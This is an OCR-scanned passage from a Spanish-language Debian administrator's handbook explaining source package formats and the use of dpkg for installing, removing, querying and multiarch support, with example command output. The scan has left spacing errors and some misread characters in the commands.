ras  comparten  los  paquetes  de  documentacion  (en  lugar  de  tener  la  documentacion 
duplicada  en  los  paquetes  para  cada  arquitectura). 


PERSPECTIVA  Originalmente  solo  existia  un  formato  de  paquete  fuente.  Este  es  el  formato  1 . 0  que 
Diferentes  formatos  de  asocia  un  compendio  .  orig .  tar .  gz  con  un  parche  de  «debianizacion»  .diff.gz 
paquetes  fuente  (tambien  hay  una  variante  que  consiste  de  un  simple  compendio  .  tar .  gz,  utilizada 
automaticamente  si  hay  disponible  un  archivo  .orig  .  tar .  gz). 

Desde  Debian  Squeeze ,  los  desarrolladores  Debian  tienen  la  opcion  de  utilizar 
nuevos  formatos  que  corrigen  varios  problemas  del  formato  historico.  El  forma¬ 
to  3.0  (quilt)  puede  combinar  varios  compendios  de  origen  en  el  mismo  pa¬ 
quete  fuente:  puede  incluir  compendios  .orig  -  componente  .  tar . gz  ademas  del 
.  orig  .  tar .  gz  usual.  Esto  es  util  con  el  software  distribuido  desde  origen  en  varios 
componentes  pero  para  el  que  se  desea  solo  un  paquete  fuente.  Estos  compendios 
tambien  puede  comprimirse  con  bzip2  o  xz  en  lugar  de  gzip,  lo  que  ahorra  es¬ 
pacio  en  disco  y  recursos  de  red.  Finalmente,  se  reemplaza  el  parche  monolftico 
.diff.gz  por  un  compendio  .  debian  .  tar .  gz  que  contiene  las  instrucciones  de 
compilacion  y  un  conjunto  de  parches  al  origen  contribuidos  por  el  desarrollador 
del  paquete.  Estos  ultimos  son  registrados  en  un  formato  compatible  con  quilt  — 
una  herramienta  que  facilita  la  gestion  de  una  serie  de  parches. 

El  archivo  .  o rig .  ta r .  gz  es  un  compendio  que  contiene  el  codigo  fuente  como  es  provisto  por 
el  desarrollador  original.  Se  le  pide  a  los  encargados  de  paquetes  Debian  que  no  modifiquen  este 
compendio  para  poder  verificar  facilmente  el  origen  e  integridad  del  archivo  (comparandolo 
simplemente  con  una  suma  de  verificacion)  y  para  respetar  los  deseos  de  algunos  autores. 

El  archivo  .debian  .tar. gz  contiene  todas  las  modificaciones  realizadas  por  el  desarrollador 
Debian,  especialmente  el  agregado  de  un  directorio  debian  que  contiene  las  instrucciones  para 
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construir  un  paquete  Debian. 


HERRAMIENTA 

Descomprimiendo  un 
paquete  fuente 


Si  tiene  un  paquete  fuente,  puede  utilizar  dpkg- source  (del  paquete  role=”pkg”) 
para  descomprimirlo: 

$  dpkg-source  -x  package_0 . 7-1 . dsc 


Tambien  puede  utilizar  apt -get  para  descargar  un  paquete  fuente  y  descompri¬ 
mirlo  inmediatamente.  Necesita,  sin  embargo,  que  las  lineas  deb-src  apropiadas 
esten  presentes  en  el  archivo  /etc/apt/sources .  list  (para  mas  detalles,  revise 
la  Seccion  6.1,  «Contenido  del  archivo  sources .  list»  pagina  106).  Estas  son  uti- 
lizadas  para  listar  los  orfgenes  de  los  paquetes  fuente  (los  servidores  en  los  que  se 
encuentran  un  grupo  de  paquetes  fuente). 

$  apt-get  source  package 


5.3.2  Utilization  dentro  de  Debian 

El  paquete  fuente  es  la  base  de  todo  en  Debian.  Todos  los  paquetes  Debian  provienen  de  un  pa¬ 
quete  fuente  y  cada  modification  en  un  paquete  Debian  es  la  consecuencia  de  una  modificacion 
realizada  al  paquete  fuente.  Los  desarrolladores  Debian  trabajan  con  el  paquete  fuente  sabiendo, 
sin  embargo,  las  consecuencias  de  sus  acciones  en  los  paquetes  binarios.  Los  frutos  de  su  labor 
se  encuentran,  entonces,  en  los  paquetes  fuentes  disponibles  desde  Debian:  puede  volver  a  ellos 
y  todo  lo  que  generan. 

Cuando  llega  una  nueva  version  de  un  paquete  (paquete  fuente  y  uno  o  mas  paquetes  binarios) 
al  servidor  Debian,  el  paquete  fuente  es  el  mas  importante.  Sera  utilizado  luego  por  una  red 
de  equipos  de  diferentes  arquitecturas  para  compilar  las  diferentes  arquitecturas  con  las  que 
Debian  es  compatible.  El  hecho  de  que  los  desarrolladores  tambien  envien  uno  o  mas  paque¬ 
tes  binarios  para  una  arquitectura  dada  (generalmente  i386  o  amd64)  es  de  relativamente  poca 
importancia  ya  que  los  mismos  bien  podrian  haberse  generado  automaticamente. 


5.4.  Manipulation  de  paquetes  con  dpkg 

dpkg  es  el  programa  base  para  manejar  paquetes  Debian  en  el  sistema.  Si  tiene  paquetes  .  deb, 
dpkg  es  lo  que  permite  instalar  o  analizar  sus  contenidos.  Pero  este  programa  solo  tiene  una 
vision  parcial  del  universo  Debian:  sabe  lo  que  esta  instalado  en  el  sistema  y  lo  que  sea  que  se  le 
provee  en  la  linea  de  ordenes,  pero  no  sabe  nada  mas  de  otros  paquetes  disponibles.  Como  tal, 
fallara  si  no  se  satisface  una  dependencia.  Por  el  contrario,  herramientas  como  apt  crearan  una 
lista  de  dependencias  para  instalar  todo  tan  automaticamente  como  sea  posible. 

NOTA  Se  debe  ver  a  dpkg  como  una  herramienta  de  sistema  (tras  bambalinas)  y  apt  como 
^dpkg  o  apt?  una  herramienta  mas  cerca  del  usuario  que  evita  las  limitaciones  del  primero.  Estas 
herramientas  trabajan  juntas,  cada  una  con  sus  particularidades,  adecuadas  para 
tareas  especificas. 
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5.4.1.  Instalacion  de  paquetes 

dp  kg  es,  sobre  todo,  la  herramienta  para  instalar  un  paquete  Debian  ya  disponible  (porque  no 
descarga  nada).  Para  hacer  esto  utilizamos  su  opcion  -i  o  —install. 

Ejemplo  5.2  Instalacion  de  un  paquete  con  dpkg 

#  dpkg  -i  man-db_2 . 7 . 0 . 2-5_amd64. deb 

(Reading  database  ...  86425  files  and  directories  currently  installed.) 
Preparing  to  unpack  man-db_2 . 7 . 0 . 2 -5_amd64 .deb  ... 

Unpacking  man-db  (2. 7. 0.2-5)  over  (2. 7. 0.2-4)  ... 

Setting  up  man-db  (2. 7. 0.2-5)  ... 

Updating  database  of  manual  pages  .  .  . 

Processing  triggers  for  mime-support  (3.58)  ... 


Podemos  ver  los  diferentes  pasos  que  realiza  dpkg;  sabemos,  por  lo  tanto,  en  que  punto  podrfa 
haber  ocurrido  un  error.  La  instalacion  tambien  puede  realizarse  en  dos  etapas:  primero  desem- 
paquetado,  luego  configuracion.  apt-get  lo  aprovecha  limitando  la  cantidad  de  invocaciones 
de  dpkg  (ya  que  cada  llamada  es  costosa  debido  a  la  carga  de  la  base  de  datos  en  memoria,  espe- 
cialmente  la  lista  de  archivos  ya  instalados). 

Ejemplo  5.3  Desempaquetado  y  configuracion  separados 

#  dpkg  --unpack  man-db_2.7.0.2-5_amd64.deb 

(Reading  database  ...  86425  files  and  directories  currently  installed.) 
Preparing  to  unpack  man-db_2 . 7 . 0 . 2 -5_amd64 .deb  ... 

Unpacking  man-db  (2. 7. 0.2-5)  over  (2. 7. 0.2-5)  ... 

Processing  triggers  for  mime-support  (3.58)  ... 

#  dpkg  --configure  man-db 
Setting  up  man-db  (2. 7. 0.2-5)  ... 

Updating  database  of  manual  pages  . . . 


A  veces  dpkg  fallara  intentando  instalar  un  paquete  y  devolvera  un  error;  si  el  usuario  le  ordena 
ignorarlo  solo  generara  una  advertencia;  es  por  esta  razon  que  tenemos  las  diferentes  opciones 
-force-*.  La  orden  dpkg  --force-help,  o  su  documentacion,  proveera  una  lista  completa  de 
estas  opciones.  El  error  mas  frecuente,  con  el  que  seguramente  se  encontrara  tarde  o  temprano, 
es  una  colision  de  archivos.  Cuando  un  paquete  contiene  un  archivo  que  ya  esta  instalado  por 
otro  paquete,  dpkg  se  negara  a  instalarlo.  Aparecera  el  siguiente  mensaje: 

Unpacking  libgdm  (from  . . ,/libgdm  3.8.3-2_amd64.deb)  ... 

dpkg:  error  processing  /var/cache/apt/archives/libgdm_3.8.3-2  amd64.deb  (--unpack): 
trying  to  overwrite  '/usr/bin/gdmflexiserver' ,  which  is  also  in  package  gdm3  3.4. 1-9 
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En  este  caso,  si  piensa  que  reemplazar  este  archivo  no  es  un  riesgo  significativo  para  la  estabi- 
lidad  de  su  sistema  (que  es  el  caso  frecuentemente),  puede  utilizar  la  opcion  -force-overwrite 
que  le  indica  a  dpkg  que  ignore  dicho  error  y  sobreescriba  el  archivo. 

Si  bien  hay  muchas  opciones  —force-*  disponibles,  probablemente  solo  utilice  regularmente  — 
force-overwrite.  Estas  opciones  solo  existen  para  situaciones  excepcionales  y  es  mejor  evitarlas 
siempre  que  sea  posible  para  respetar  las  reglas  impuestas  por  el  mecanismo  de  empaquetado. 
No  olvide  que  estas  reglas  aseguran  la  consistencia  y  estabilidad  de  su  sistema. 


PRECAUCION  Si  no  es  cuidadoso,  utilizar  una  opcion  -  -force-*  puede  llevar  a  un  sistema  en 
Uso  efectivo  de  -  -force-*  *iue  de  programas  APT  se  negaran  a  funcionar.  De  hecho,  algunas  de 

estas  opciones  permitiran  instalar  un  paquete  cuando  no  se  cumple  una  de  sus  de¬ 
pendences  o  cuando  existe  un  conflicto.  El  resultado  sera  un  sistema  inconsistente 
desde  el  punto  de  vista  de  dependencias  y  los  programas  APT  se  negaran  a  efectuar 
cualquier  accion  excepto  aquellas  que  le  permitan  devolver  el  sistema  a  un  estado 
consistente  (que  generalmente  consiste  en  instalar  la  dependencia  faltante  o  elimi- 
nar  un  paquete  problematico).  Esto  resulta  en  mensajes  como  el  siguiente,  obtenido 
luego  de  instalar  una  nueva  version  de  rdesktop  ignorando  su  dependencia  en  una 
nueva  version  de  iibc6 : 

#  apt  full-upgrade 

[.  .  .] 

You  might  want  to  run  'apt-get  -f  install'  to  correct  these 

. 

The  following  packages  have  unmet  dependencies: 

rdesktop:  Depends:  libc6  (>=  2.5)  but  2 . 3 . 6 . dsl- 13etch7 
is  installed 

E:  Unmet  dependencies.  Try  using  -f. 

Un  administrador  valiente  que  esta  seguro  de  la  correctitud  de  su  analisis  podria 
elegir  ignorar  una  dependencia  o conflicto  y  utilizar  la  opcion  -  -  force-*  correspon- 
diente.  En  este  caso,  si  desea  poder  continuar  utilizando  apt  o  aptitude,  debera 
editar  /var/lib/dpkg/status  para  borrar  o  modificar  la  dependencia  o  conflicto 
que  desea  invalidar. 

Esta  manipulacion  es  un  atajo  desagradable  y  no  deberia  ser  utilizado  nunca  excep¬ 
to  en  los  casos  de  mas  extrema  necesidad.  Muy  frecuentemente,  recompilar  el  pa¬ 
quete  que  esta  causando  el  problema  (revise  la  Seccion  15.1,  «Recompilaci6n  de  un 
paquete  desde  sus  fuentes»  pagina  446)  o  utilizar  una  nueva  verion  (potencialmen- 
te  corregida)  de  un  repositorio  como  stable- backports  (revise  la  Seccion  6.1. 2.4, 
«Retroadaptaciones  para  Stable*  pagina  110)  son  soluciones  mas  adecuadas. 


5.4.2  Eliminacion  de  un  paquete 

Ejecutar  dpkg  con  la  opcion  -r  o  -remove  seguida  del  nombre  de  un  paquete  eliminara  dicho 
paquete.  Esta  eliminacion,  sin  embargo,  no  es  completa:  se  mantendran  todos  los  archivos  de 
configuracion,  scripts  del  encargado,  archivos  de  registros  (registros  de  sistema)  y  otros  datos 
de  usuarios  que  gestiona  el  paquete.  De  esta  forma,  puede  desactivar  el  programa  facilmente  al 
desinstalarlo  pero  es  posible  reinstalarlo  rapidamente  con  la  misma  configuracion.  Para  elimi- 


Capitulo  5  —  Sistema  de  paquetes:  herramientas  y  principios  fundamentales 


95 


nar  completamente  todo  lo  asociado  con  un  paquete,  utilice  la  opcion  -P  o  —purge  seguida  del 
nombre  del  paquete. 


Ejemplo  5.4  Elimination  y  purgado  del  paquete  debian-cd 


#  dpkg  -r  debian-cd 

(Reading  database  . . .  97747 
Removing  debian-cd  (3.1.17) 

#  dpkg  -P  debian-cd 
(Reading  database  . . .  97401 
Removing  debian-cd  (3.1.17) 
Purging  configuration  files 


files  and  directories  currently  installed.) 


files  and  directories  currently  installed.) 
for  debian-cd  (3.1.17)  ... 


5.4.3  Consulta  de  la  base  de  datos  de  dpkg  e  inspeccion  de  archivos  .deb 


VOLVER  A  LOS  CIMIENTOS  La  mayoria  de  las  opciones  se  encuentran  disponibles  en  unaversion  «larga»  (una  o 
Sintaxis  de  opciones  mas  Palat>ras  relevantes  precedidas  por  doble  guion)  y  en  una  version  «corta»  (una 
unica  letra,  normalmente  la  primera  de  las  letras  de  la  version  larga,  y  precedida 
por  un  unico  guion).  Esta  convencion  es  tan  comun  que  constituye  un  estandar 
POSIX. 


Antes  de  finalizar  esta  seccion,  estudiaremos  algunas  opciones  de  dpkg  que  consultan  la  base 
de  datos  interna  para  obtener  informacion.  Daremos  primero  las  opciones  en  su  version  larga  y 
luego  la  version  corta  correspondiente  (que  evidentemente  aceptaran  los  mismos  parametros 
posibles)  de  las  opciones:  —  listfiles  paquete  (o  -L),  que  listara  los  archivos  instalados  por  este 
paquete;  —search  archivo  (o  -S),  que  encontrara  el  o  los  paquetes  que  contienen  el  archivo;  —  sta 
tus  paquete  (o  -s),  que  mostrara  las  cabeceras  de  un  paquete  instalado;  —list  (o  -I),  que  mostrara 
la  lista  de  paquetes  conocidos  por  el  sistemay  su  estado  de  instalacion;  -contents  archivo.deb 
(o  -c),  que  listara  los  archivos  en  el  paquete  Debian  especificado;  —info  archivo.deb  (o  -I),  que 
mostrara  las  cabeceras  de  este  paquete  Debian. 

Ejemplo  5.5  Varias  consultas  con  dpkg 


$  dpkg  -L  base-passwd 

/. 

/usr 

/usr/sbin 

/usr/s bin/update- pa sswd 

/usr/share 

/us r/s ha  re/lint ian 

/usr/s ha  re/lint ian/over  rides 

/u s r/s ha  re/lint ian/over  rides/base- pas swd 

/us r/s ha  re/doc -base 
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/usr/s ha  re/doc  -  base/ users -and -groups 
/u sr/s ha  re/base- pas swd 
/u sr/s ha  re/base- pas swd/g roup . master 
/u s r/s ha  re/base- pas swd/pas swd .master 
/usr/share/man 
[..  .] 

/usr/share/doc 

/us r/s ha  re/doc/ base -pas swd 

/u s r/s ha  re/doc/ base  -  pa sswd/users- and -groups . txt . gz 

/us r/s ha  re/doc/ base- pa sswd/changelog . gz 

/us r/s ha  re/doc/ base- pa s swd/ copy right 

/us r/s ha  re/doc/ base- pa sswd/README 

/us r/s ha  re/doc/ base -pa sswd/users -and -groups . html 

$  dpkg  -S  /bin/date 

coreutils:  /bin/date 

$  dpkg  -s  coreutils 

Package:  coreutils 

Essential:  yes 

Status:  install  ok  installed 
Priority:  required 
Section:  utils 
Installed-Size:  13855 

Maintainer:  Michael  Stone  <mstone@debian ,org> 

Architecture:  amd64 
Multi-Arch:  foreign 
Version:  8.23-3 

Replaces:  mktemp,  realpath,  timeout 

Pre-Depends:  libacll  (>=  2.2.51-8),  libattrl  (>=  1:2.4.46-8),  libc6  (>=  2.17), 
libselinuxl  (>=  2.1.13) 

Conflicts:  timeout 
Description:  GNU  core  utilities 

This  package  contains  the  basic  file,  shell  and  text  manipulation 
utilities  which  are  expected  to  exist  on  every  operating  system. 

Specifically,  this  package  includes: 

arch  base64  basename  cat  chcon  chgrp  chmod  chown  chroot  cksum  comm  cp 
csplit  cut  date  dd  df  dir  dircolors  dirname  du  echo  env  expand  expr 
factor  false  flock  fmt  fold  groups  head  hostid  id  install  join  link  In 
logname  Is  md5sum  mkdir  mkfifo  mknod  mktemp  mv  nice  nl  nohup  nproc  numfmt 
od  paste  pathchk  pinky  pr  printenv  printf  ptx  pwd  readlink  realpath  rm 
rmdir  runcon  sha*sum  seq  shred  sleep  sort  split  stat  stty  sum  sync  tac 
tail  tee  test  timeout  touch  tr  true  truncate  tsort  tty  uname  unexpand 
uniq  unlink  users  vdir  wc  who  whoami  yes 
Homepage :  http : //gnu . org/ software/ co reutils 
$  dpkg  -l  'b*' 

Desired=Un known/I n stall /Remove/ Purge/Hold 

|  Status=Not/Inst/Conf -f iles/Unpacked/halF-conf /Half -inst/trig -aWait/T rig -pend 
|/  Err?=(none)/Reinst- required  (Status, Err:  uppercase=bad) 

||/  Name  Version  Architecture  Description 
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+++- 


un 

backupninj  a 
available) 

<none> 

<none> 

(no  description 

ii 

backuppc 

3. 3. 0-2 

amd64 

high-performance, 

enterprise-grade 

system  for  backin 

un 

base 

available) 

<none> 

<none> 

(no  description 

un 

base- conf ig 
available) 

<none> 

<none> 

(no  description 

ii 

base- files 

8 

amd64 

Debian  base  system 

miscellaneous  files 

ii 

base- passwd 

3.5.37 

amd64 

Debian  base  system 

master  password  and  group  files 

[..  .] 


$  dpkg  -c  /var/cache/apt/archives/gnupg_1.4.18-6_amd64.deb 


drwxr-xr-x 

root/ root 

0 

2014-12-04 

23:03 

./ 

drwxr-xr-x 

root/ root 

0 

2014-12-04 

23:03 

./lib/ 

drwxr-xr-x 

root/ root 

0 

2014-12-04 

23:03 

. /lib/udev/ 

drwxr-xr-x 

root/ root 

0 

2014-12-04 

23:03 

. /lib/udev/ rules . d/ 

-  rw- r- - r- - 

root/ root 

2711 

2014-12-04 

23:03 

. /lib/udev/ rules . d/60-gnupg . rules 

drwxr-xr-x 

root/ root 

0 

2014-12-04 

23:03 

./usr/ 

drwxr-xr-x 

root/ root 

0 

2014-12-04 

23:03 

,/usr/lib/ 

drwxr-xr-x 

root/ root 

0 

2014-12-04 

23:03 

. /us  r/lib/gnupg/ 

- rwxr-xr-x 

root/ root 

39328 

2014-12-04 

23:03 

. /usr/lib/gnupg/gpgkeys 

Idap 

- rwxr-xr-x 

root/ root 

92872 

2014-12-04 

23:03 

. /usr/lib/gnupg/gpgkeys 

hkp 

- rwxr-xr-x 

root/ root 

47576 

2014-12-04 

23:03 

. /usr/lib/gnupg/gpgkeys 

finger 

- rwxr-xr-x 

root/ root 

84648 

2014-12-04 

23:03 

. /usr/lib/gnupg/gpgkeys 

curl 

- rwxr-xr-x 

root/ root 

3499 

2014-12-04 

23:03 

. /usr/lib/gnupg/gpgkeys 

mailto 

drwxr-xr-x 

root/ root 

0 

2014-12-04 

23:03 

. /us  r/bin/ 

- rwxr-xr-x 

root/ root 

60128 

2014-12-04 

23:03 

. /us  r/bin/gpg split 

- rwxr-xr-x 

root/ root 

1012688 

2014-12-04 

23:03 

,/usr/bin/gpg 

t...] 

$  dpkg  -I  /var/cache/apt/archives/gnupg_1.4.18-6_amd64.deb 

new  debian  package,  version  2.0. 

size  1148362  bytes:  control  archive=3422  bytes. 


1264  bytes, 

26  lines 

control 

4521  bytes, 

65  lines 

md5sums 

479  bytes, 

13  lines 

*  postinst 

#!/bin/sh 

473  bytes, 

13  lines 

*  preinst 

#!/bin/sh 

Package:  gnupg 

Version:  1.4.18-6 
Architecture:  amd64 

Maintainer:  Debian  GnuPG-Maintainers  <pkg -gnupg-maint@lists . alioth . debian . org> 
Installed-Size:  4888 

Depends:  gpgv,  libbz2-1.0,  libc6  (>=  2.15),  libreadline6  (>=  6.0),  libusb-0.1-4 
(>=  2:0.1.12),  zliblg  (>=  1:1. 1.4) 

Recommends:  gnupg-curl,  libldap-2 .4-2  (>=  2.4.7) 

Suggests:  gnupg-doc,  libpcsclitel,  parcimonie,  xloadimage  |  imagemagick  |  eog 


98 


El  manual  del  Administrador  de  Debian 


Section:  utils 
Priority:  important 
Multi-Arch:  foreign 
Homepage:  http://www.gnupg.org 

Description:  GNU  privacy  guard  -  a  free  PGP  replacement 
GnuPG  is  GNU's  tool  for  secure  communication  and  data  storage. 

It  can  be  used  to  encrypt  data  and  to  create  digital  signatures. 

It  includes  an  advanced  key  management  facility  and  is  compliant 
with  the  proposed  OpenPGP  Internet  standard  as  described  in  RFC  4880. 
[■■■] 


Dado  que  dpkg  es  el  programa  para  gestionar  paquetes  Debian,  tambien  provee  la 
implementacion  de  referenda  para  la  logica  de  comparacion  de  numeros  de  version. 
Es  por  esto  que  tiene  una  opcion  -  -  compare- versions,  que  puede  ser  utilizada  por 
programas  externos  (especialmente  scripts  de  configuracion  ejecutados  por  dpkg 
mismo).  Esta  opcion  necesita  tres  parametros:  un  numero  de  version,  un  operador 
de  comparacion  y  un  segundo  numero  de  version.  Los  diferentes  operadores  posi- 
bles  son:  It  (estrictamente  menor),  le  (menor  o  igual),  eq  (igual),  ne  (distinto),  ge 
(mayor  o  igual)  y  gt  (estrictamente  mayor).  Si  la  comparacion  es  correcta,  dpkg 
devuelve  0  (exito);  de  lo  contrario  devolvera  un  valor  distinto  de  cero  (indicado  un 
fallo). 

$  dpkg  - -compare-versions  1.2-3  gt  1.1-4 
$  echo  $? 

0 

$  dpkg  - -compare-versions  1.2-3  It  1.1-4 
$  echo  $? 

1 

$  dpkg  - -compare-versions  2.6.0pre3-l  It  2. 6. 0-1 
$  echo  $? 

1 

Note  el  fallo  inesperado  de  la  ultima  comparacion:  pre,  que  generalmente  denota 
una  prepublicacion,  no  tiene  un  significado  especial  para  dpkg  y  este  compara  los 
caracteres  alfabeticos  de  la  misma  forma  que  los  numeros  (a  <  b  <  c  ...):  en  orden 
alfabetico.  Es  por  esto  que  considera  «0pre3»  mayor  que  «0».  Si  deseamos  que  el 
numero  de  version  de  un  paquete  indique  que  es  una  prepublicacion,  utilizamos  el 
caracter  virgulilla:  «-»: 

$  dpkg  - -compare-versions  2.6.0-pre3-l  It  2. 6. 0-1 
$  echo  $? 

0 


5.4.4  Archivo  de  registro  de  dpkg 

dpkg  mantiene  un  registro  de  todas  sus  acciones  en  /va  r/log/dpkg  .  log.  Este  registro  es  extre- 
madamente  detallado  ya  que  incluye  cada  una  de  las  etapas  por  las  que  pasa  un  paquete  ges- 
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tionado  por  dp  kg.  Ademas  de  ofrecer  una  forma  de  rastrear  el  funcionamiento  de  dpkg,  sobre 
todo  ayuda  a  mantener  un  historial  del  desarrollo  del  sistema:  uno  puede  encontrar  el  momen¬ 
ta  exacto  en  el  que  se  instalo  o  actualizo  un  paquete,  y  esta  informacion  puede  ser  extremada- 
mente  util  cuando  se  intenta  entender  un  cambio  de  comportamiento  reciente.  Ademas,  como 
se  registran  todas  las  versiones,  es  sencillo  verificar  y  referenciar  informacion  con  el  archivo 
changelog  .  Debian .  gz  del  paquete  en  cuestion  o  inclusive  con  reportes  de  error  online. 


5.4.5.  Compatibilidad  multiarquitectura 

Todos  los  paquetes  Debian  poseen  un  campo  «Architecture»  (arquitectura)  en  su  informacion 
de  control.  El  valor  de  este  campo  puede  ser  «all»  (para  los  paquetes  que  son  independientes  de 
la  arquitectura)  o  el  nombre  de  la  arquitectura  al  que  esta  destinado  (como  «amd64»,  «armhf», 
...).  En  el  ultimo  caso,  de  forma  predeterminada,  dpkg  solo  aceptara  instalar  el  paquete  si  su 
arquitectura  coincide  con  la  arquitectura  del  equipo  segun  es  informada  por  dpkg  -  -  print  - 
architecture. 

Esta  restriccion  asegura  que  el  usuario  no  termine  con  binarios  compilados  para  la  arquitectura 
incorrecta.  Todo  serfa  perfecto  si  no  fuese  que  (algunos)  equipos  puede  ejecutar  binarios  para 
mas  de  una  arquitectura,  ya  sea  de  forma  nativa  (un  sistema  «amd64»  puede  ejecutar  binarios 
«i386»)  o  a  traves  de  emuladores. 


Activacion  de  multiarquitectura 

La  compatibilidad  multiarquitectura  de  d  p  kg  le  permite  al  usuario  definir  «arquitecturas  extran- 
jeras»  que  pueden  ser  instaladas  en  el  sistema  actual.  Puede  hacer  esto  simplemente  ejecutando 
dpkg  -  -  add -architecture  como  en  el  ejemplo  a  continuation.  Existe  tambien  el  correspon- 
diente  dpkg  -  -  remove- architecture  para  eliminar  la  compatibilidad  de  una  arquitectura  ex- 
tranjera,  pero  solo  puede  utilizarlo  cuando  ya  no  existan  paquetes  instalados  de  dicha  arquitec¬ 
tura. 

#  dpkg  --print-architecture 

amd64 

#  dpkg  --print-foreign-architectures 

#  dpkg  -i  gcc-4 . 9-base_4 . 9 . l-19_armhf . deb 

dpkg:  error  processing  archive  gcc-4. 9-base  4.9. 1-19  armhf. deb  (--install): 

package  architecture  (armhf)  does  not  match  system  (amd64) 

Errors  were  encountered  while  processing: 
gcc-4 . 9- base_4 . 9 . 1- 19_a rmhf .deb 

#  dpkg  --add-architecture  armhf 

#  dpkg  --add-architecture  armel 

#  dpkg  --print-foreign-architectures 

armhf 

armel 

#  dpkg  -i  gcc-4 . 9-base_4 . 9 . l-19_armhf . deb 

Selecting  previously  unselected  package  gcc-4. 9-base : armhf . 

(Reading  database  ...  86425  files  and  directories  currently  installed.) 
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Preparing  to  unpack  gcc-4 . 9- base_4 . 9 . 1- 19_armhf . deb  ... 

Unpacking  gcc-4. 9-base:armhf  (4.9.1-19)  ... 

Setting  up  gcc-4, 9-base:armhf  (4.9.1-19)  ... 

#  dpkg  --remove-architecture  armhf 

dpkg:  error:  cannot  remove  architecture  'armhf'  currently  in  use  by  the  database 

#  dpkg  --remove-architecture  armel 

#  dpkg  --print-foreign-architectures 

armhf 


NOTA  APT  detectara  automaticamente  cuando  se  haya  configurado  a  dpkg  para  que  sea 
Compatibilidad  compatible  con  arquitecturas  extranejeras  y  descargara  los  archivos  Packages  co- 
multiarquitectura  de  APT  rrespondientes  durante  su  proceso  de  actualizacion. 

Luego  podra  instalar  paquetes  extranejros  con  apt  install  paquete'.arquitec 
tura. 


EN  LA  PRACTICA 

Utilizacion  de  binarios 
i386  privativos  en  amd64 


Hay  muchos  casos  de  uso  para  multiarquitectura,  pero  el  mas  popular  es  la  ca- 
pacidad  de  instalar  binarios  de  32  bits  (i 386)  en  sistemas  de  64  bits  (amd64),  en 
particular  debido  a  que  varias  aplicaciones  privativas  populares  (como  Skype)  solo 
proveen  versiones  de  32  bits. 


Cambios  relacionados  con  multiarquitectura 

Para  poder  hacer  que  multiarquitectura  fuese  util  y  usable,  se  debieron  reempaquetar  bibliote- 
cas  y  moverlas  a  un  directorio  especifico  de  la  arquitectura  para  que  se  pudieran  instalar  simul- 
taneamete  varias  copias  (para  diferentes  arquitecturas).  Estos  paquetes  actualizados  contienen 
el  campo  de  cabecera  «Multi-Arch:same»  para  indicarle  al  sistema  de  paquetes  que  se  pueden 
instalar  simultaneamente  y  sin  problemas  varias  arquitecturas  del  mismo  (y  que  dichos  paque¬ 
tes  solo  satisfacen  dependencias  de  los  paquetes  de  la  misma  arquitectura).  Desde  el  debut  de 
multiarquitectura  en  Debian  Wheezy,  aun  no  todas  las  bibliotecas  fueron  convertidas. 

$  dpkg  -s  gcc-4. 9-base 

dpkg-query:  error:  --status  needs  a  valid  package  name  but  'gcc-4. 9-base'  is  not: 

ambiguous  package  name  'gcc-4. 9-base'  with  more  than  one  installed  instance 

Use  --help  for  help  about  querying  packages. 

$  dpkg  -s  gcc-4. 9-base:amd64  gcc-4. 9-base:armhf  |  grep  ''Multi 

Multi-Arch:  same 
Multi-Arch:  same 

$  dpkg  -L  libgccl:amd64  |grep  .so 
/lib/x86  64-linux-gnu/libgcc_s . so . 1 

$  dpkg  -S  /usr/share/doc/gcc-4 . 9-base/copyright 

gcc-4.9-base:amd64,  gcc-4. 9 -base: armhf:  /usr/share/doc/gcc-4. 9  -  base/ copy right 

Vale  la  pena  aclarar  que  los  paquetes  que  contengan  Multi-Arch:same  deben  poseer  nombres 
que  inlcuyan  su  arquitectura  para  poder  identificarlos  univocamente.  Tambien  tienen  la  posibi- 
lidad  de  compartir  archivos  con  otras  instancias  del  mismo  paquete;  dpkg  se  asegura  que  todos 
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los  paquetes  tengan  archivos  identicos  bit  a  bit  cuando  son  compartidos.  Por  ultimo,  todas  las 
instancias  de  un  paquete  deben  tener  la  misma  version.  Por  lo  tanto,  deben  actualizarse  simul- 
taneamente. 

La  compatibilidad  multiarquitectura  tambien  viene  aparejada  con  algunos  retos  interesantes  so- 
bre  la  forma  en  la  que  se  gestionan  las  dependencias.  Para  satisfacer  una  dependencia  se  necesita 
un  paquete  marcado  con  «Multi-Arch:foreign»  o  bien  un  paquete  cuya  arquitectura  coincida  con 
la  del  paquete  que  declara  la  dependencia  (en  este  proceso  de  resolucion  de  dependencias,  se 
asume  que  los  paquetes  independientes  de  la  arquitectura  son  de  la  misma  arquitectura  que  el 
sistema).  Tambien  se  puede  debilitar  una  dependencia  para  permitir  que  cualquier  arquitectu¬ 
ra  la  satisfaga  con  la  sintaxis  paquete: any,  pero  los  paquetes  extranjeros  solo  pueden  satisfacer 
dicha  dependencia  si  estan  marcados  con  «Multi-Arch:allowed». 


5.5.  Coexistencia  con  otros  sistemas  paquetes 

Los  paquetes  Debian  no  son  los  unicos  paquetes  de  software  utilizados  en  el  mundo  del  software 
libre.  El  principal  competidor  es  el  formato  RPM  de  la  distribucion  Red  Hat  Linux  y  sus  muchos 
derivados.  Red  Hat  es  una  distribucion  comercial  muy  popular.  Por  lo  tanto,  es  muy  comun  que 
el  software  provisto  por  terceros  sea  ofrecido  como  paquetes  RPM  en  lugar  de  paquetes  Debian. 

En  este  caso  debe  saber  que  el  programa  rpm,  que  gestiona  los  paquetes  RPM,  esta  disponible 
como  un  paquete  Debian;  por  lo  que  es  posible  utilizar  este  formato  de  paquetes  en  Debian.  De¬ 
be  tener  cuidado  sin  embargo,  y  limitar  estas  manipulaciones  a  extraer  la  informacion  de  un 
paquete  o  verificar  su  integridad.  No  es,  en  realidad,  razonable  utilizar  rpm  para  instalar  un  pa¬ 
quete  RPM  en  un  sistema  Debian;  RPM  utiliza  su  propia  base  de  datos,  separada  de  aquella  del 
software  nativo  (como  dp  kg.  Es  por  esto  que  no  es  posible  asegurar  una  coexistencia  estable  de 
dos  sistemas  de  paquetes. 

Por  el  otro  lado,  la  herramienta  alien  puede  convertir  paquetes  RPM  en  paquetes  Debian  y  vice- 
versa. 


COMUNIDAD  Si  utiliza  el  programa  alien  frecuentemente  para  instalar  paquetes  RPM  de  alguno 
Fomentando  la  adopcion  de  sus  Proveedores,  no  dude  en  escribirle  y  expresar  su  fuerte  preferencia  por  el  for- 

de  deb  mato  .  deb.  Note  que  el  formato  del  paquete  no  es  todo:  un  paquete  .  deb  construido 

con  alien,  preparado  para  una  version  de  Debian  diferente  a  la  que  utiliza,  o  in¬ 
